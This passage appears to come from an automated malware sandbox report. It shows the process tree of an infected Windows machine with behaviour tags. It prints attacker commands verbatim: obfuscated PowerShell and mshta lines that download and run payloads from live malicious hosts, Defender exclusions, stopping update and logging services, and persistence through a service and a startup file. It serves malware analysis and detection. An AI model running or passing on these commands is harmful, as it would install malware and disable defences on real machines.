                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:4368
                                                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                              wmic os get Caption
                                                                                                                                              4⤵
                                                                                                                                                PID:4132
                                                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                wmic cpu get Name
                                                                                                                                                4⤵
                                                                                                                                                  PID:2584
                                                                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                  wmic path win32_VideoController get name
                                                                                                                                                  4⤵
                                                                                                                                                  • Detects videocard installed
                                                                                                                                                  PID:4844
                                                                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                  wmic csproduct get UUID
                                                                                                                                                  4⤵
                                                                                                                                                    PID:900
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                  PID:4588
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""
                                                                                                                                                    4⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    PID:1232
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:2088
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4000
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\333.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\333.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:2152
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:480
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\test12.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\test12.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:1088
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\test6.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\test6.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:2680
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\test14.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\test14.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:2344
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\pantest.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\pantest.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:2976
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\test9.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\test9.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:1564
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\test10-29.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\test10-29.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:960
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\test19.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\test19.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:2708
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\test10.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\test10.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4396
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\test_again4.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\test_again4.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:3868
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\test23.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\test23.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4208
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\test5.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\test5.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4060
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\test11.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\test11.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:1844
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\test20.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\test20.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:1948
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\test_again3.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\test_again3.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:3248
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\test16.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\test16.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:5060
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\test13.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\test13.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:1812
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\test_again2.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\test_again2.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4352
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\test15.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\test15.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:968
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\test18.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\test18.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:452
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\test21.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\test21.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:2912
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\test22.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\test22.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:896
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\test8.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\test8.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:3260
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\test7.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\test7.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:2836
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\test-again.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\test-again.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:3360
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\test17.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\test17.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4392
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:4800
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe"
                                                                                                                                                    4⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:3764
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\win.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\win.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:4768
                                                                                                                                                  • C:\Windows\SysWOW64\route.exe
                                                                                                                                                    route print
                                                                                                                                                    4⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:3400
                                                                                                                                                  • C:\Windows\SysWOW64\arp.exe
                                                                                                                                                    arp -a 10.127.0.1
                                                                                                                                                    4⤵
                                                                                                                                                    • Network Service Discovery
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:2780
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\x4lburt.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\x4lburt.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                  PID:2276
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\computerlead.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\computerlead.exe
                                                                                                                                                    4⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:1828
                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                                                                      5⤵
                                                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:4192
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 336
                                                                                                                                                        6⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:8
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:3764
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:1840
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
                                                                                                                                                    4⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:2264
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\0fVlNye.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\0fVlNye.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:2636
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd
                                                                                                                                                    4⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:3560
                                                                                                                                                    • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                      tasklist
                                                                                                                                                      5⤵
                                                                                                                                                      • Enumerates processes with tasklist
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:1388
                                                                                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                      findstr /I "wrsa opssvc"
                                                                                                                                                      5⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:1356
                                                                                                                                                    • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                      tasklist
                                                                                                                                                      5⤵
                                                                                                                                                      • Enumerates processes with tasklist
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:3116
                                                                                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                      findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                      5⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:2404
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      cmd /c md 29442
                                                                                                                                                      5⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:1760
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      cmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized l
                                                                                                                                                      5⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:3140
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com
                                                                                                                                                      Reynolds.com l
                                                                                                                                                      5⤵
                                                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                      PID:1560
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com
                                                                                                                                                        6⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        PID:2012
                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                          explorer.exe
                                                                                                                                                          7⤵
                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                          PID:1464
                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            8⤵
                                                                                                                                                              PID:5052
                                                                                                                                                      • C:\Windows\SysWOW64\choice.exe
                                                                                                                                                        choice /d y /t 5
                                                                                                                                                        5⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:4320
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe"
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:2652
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
                                                                                                                                                      4⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:1472
                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                        taskkill /f /im tftp.exe
                                                                                                                                                        5⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                        PID:2408
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\tftp.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
                                                                                                                                                      4⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:4012
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
                                                                                                                                                      4⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:1684
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
                                                                                                                                                        5⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:3468
                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                          taskkill /f /im tftp.exe
                                                                                                                                                          6⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                          PID:2732
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\rh.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\rh.exe"
                                                                                                                                                    3⤵
                                                                                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:2656
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2656 -s 612
                                                                                                                                                      4⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:2400
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\file.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\file.exe"
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:4912
                                                                                                                                                    • C:\Windows\SYSTEM32\wscript.exe
                                                                                                                                                      "wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
                                                                                                                                                      4⤵
                                                                                                                                                        PID:3492
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                                                                                                          5⤵
                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          • Modifies registry class
                                                                                                                                                          PID:3468
                                                                                                                                                          • C:\Windows\System32\WScript.exe
                                                                                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
                                                                                                                                                            6⤵
                                                                                                                                                              PID:1404
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:4448
                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:3836
                                                                                                                                                                    • C:\Windows\system32\mshta.exe
                                                                                                                                                                      mshta http://176.113.115.178/Windows-Update
                                                                                                                                                                      8⤵
                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                      PID:1696
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                                                                                                                        9⤵
                                                                                                                                                                        • UAC bypass
                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                        PID:2004
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
                                                                                                                                                                          10⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          PID:3144
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\LB31.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\LB31.exe"
                                                                                                                                                                          10⤵
                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                          PID:2956
                                                                                                                                                                          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                            11⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            PID:1028
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                            11⤵
                                                                                                                                                                              PID:4424
                                                                                                                                                                              • C:\Windows\system32\wusa.exe
                                                                                                                                                                                wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                12⤵
                                                                                                                                                                                  PID:1676
                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                11⤵
                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                PID:3948
                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                11⤵
                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                PID:4988
                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                11⤵
                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                PID:5096
                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                11⤵
                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                PID:3584
                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                11⤵
                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                PID:4540
                                                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                11⤵
                                                                                                                                                                                • Power Settings
                                                                                                                                                                                PID:4376
                                                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                11⤵
                                                                                                                                                                                • Power Settings
                                                                                                                                                                                PID:2624
                                                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                11⤵
                                                                                                                                                                                • Power Settings
                                                                                                                                                                                PID:2580
                                                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                11⤵
                                                                                                                                                                                • Power Settings
                                                                                                                                                                                PID:2172
                                                                                                                                                                              • C:\Windows\system32\dialer.exe
                                                                                                                                                                                C:\Windows\system32\dialer.exe
                                                                                                                                                                                11⤵
                                                                                                                                                                                  PID:4756
                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                  C:\Windows\system32\sc.exe delete "LIB"
                                                                                                                                                                                  11⤵
                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                  PID:2496
                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                  C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
                                                                                                                                                                                  11⤵
                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                  PID:3256
                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                  C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                                                                  11⤵
                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                  PID:4888
                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                  C:\Windows\system32\sc.exe start "LIB"
                                                                                                                                                                                  11⤵
                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                  PID:1384
                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    12⤵
                                                                                                                                                                                      PID:4832
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                        PID:5044
                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & echo URL="C:\Users\Admin\AppData\Local\CyberSphere Dynamics\ZeusChat.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & exit
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Drops startup file
